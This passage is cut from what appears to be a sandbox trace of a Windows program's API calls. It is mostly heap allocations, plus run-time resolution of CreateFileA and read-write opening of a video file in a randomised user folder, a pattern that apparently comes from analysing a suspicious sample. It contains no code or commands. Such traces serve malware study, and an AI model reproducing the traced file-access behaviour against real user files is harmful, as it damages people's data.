returned 0x8e1b30 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0196.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0196.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0196.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0196.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0196.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0196.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0196.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0196.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0196.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0196.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0196.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0196.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0196.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0196.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0196.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0196.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0196.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0196.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0196.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0196.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0196.934] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0196.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0196.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0196.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0196.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0196.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0196.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0196.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0196.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0196.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0196.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0196.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0196.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0196.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0196.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0196.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0196.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0196.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0196.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0196.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0196.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0196.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0196.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0196.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0196.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0196.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0196.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0196.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0196.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0196.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0196.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0196.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0196.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0196.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0196.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0196.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0196.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0196.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0196.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0196.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0196.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0196.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0196.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0196.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0196.936] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0196.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0196.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0196.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0196.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd8b8 [0196.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd8b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0196.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0196.937] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0196.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0196.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0196.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0196.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0196.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0196.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0196.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0196.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd8b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0196.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0196.937] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0196.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0196.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0196.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0196.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0196.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0196.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0196.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0196.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0196.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0196.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0196.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi", cchWideChar=79, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0196.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4f) returned 0x923b28 [0196.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi", cchWideChar=79, lpMultiByteStr=0x923b28, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi", lpUsedDefaultChar=0x0) returned 79 [0196.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0196.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0196.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0196.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0196.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0196.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0196.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0196.938] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\c5jup_nf8xpmtrun_.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0196.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0196.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0196.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0196.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=79, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9e) returned 0x8f9058 [0196.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=79, lpWideCharStr=0x8f9058, cchWideChar=79 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.avi") returned 79 [0196.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0196.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0196.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0196.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0196.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0196.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0196.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0196.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 